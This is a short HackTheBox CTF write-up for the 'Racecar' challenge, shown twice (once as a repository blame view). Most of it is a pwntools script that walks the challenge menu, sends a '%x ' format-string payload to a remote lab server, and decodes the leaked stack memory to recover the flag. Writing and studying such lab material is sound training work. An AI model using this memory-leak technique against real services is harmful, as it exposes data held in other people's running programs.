writeups/hackthebox/racecar.md

# Racecar

* This challenge contains a simple format string exploit. Further instructions can be found in [my pentest repo](https://git.stefan.works/whx/pentest_tools/src/branch/master/Exploits/Binaries/Format%20String.md)

```python
p = remote('178.62.88.151',31280)

p.recv()
p.sendline(b'whackx')
p.recv()
p.sendline(b'whackx')

print(p.recv())
p.sendline(b'1')
print(p.recv())
p.sendline(b'2')
print(p.recv())
p.sendline(b'1')
print(p.recv())
p.sendline(b'2')

print(p.recv())
p.sendline(b'%x ' *100)
print("[+] send payload")

l = p.recvall()
l =l.split(b'm\n')
l = l[-1].split()
res = []
for x in l[::-1]:
    try:
        #print(bytes.fromhex(x.split()[0].decode())[::-1])
        x = bytes.fromhex(x.decode())[::-1]
        res.append(x.decode())
    except:
        pass
print(''.join(res[::-1]))
p.close()
```
hackthebox init 2022-12-12 22:39:45 +01:00			`# Racecar`

			`* This challenge contains a simple format string exploit. Further instructions can be found in [my pentest repo](https://git.stefan.works/whx/pentest_tools/src/branch/master/Exploits/Binaries/Format%20String.md)`

			```python
			`p = remote('178.62.88.151',31280)`

			`p.recv()`
			`p.sendline(b'whackx')`
			`p.recv()`
			`p.sendline(b'whackx')`

			`print(p.recv())`
			`p.sendline(b'1')`
			`print(p.recv())`
			`p.sendline(b'2')`
			`print(p.recv())`
			`p.sendline(b'1')`
			`print(p.recv())`
			`p.sendline(b'2')`

			`print(p.recv())`
			`p.sendline(b'%x ' *100)`
			`print("[+] send payload")`

			`l = p.recvall()`
			`l =l.split(b'm\n')`
			`l = l[-1].split()`
			`res = []`
			`for x in l[::-1]:`
			`try:`
			`#print(bytes.fromhex(x.split()[0].decode())[::-1])`
			`x = bytes.fromhex(x.decode())[::-1]`
			`res.append(x.decode())`
			`except:`
			`pass`
			`print(''.join(res[::-1]))`
			`p.close()`
			```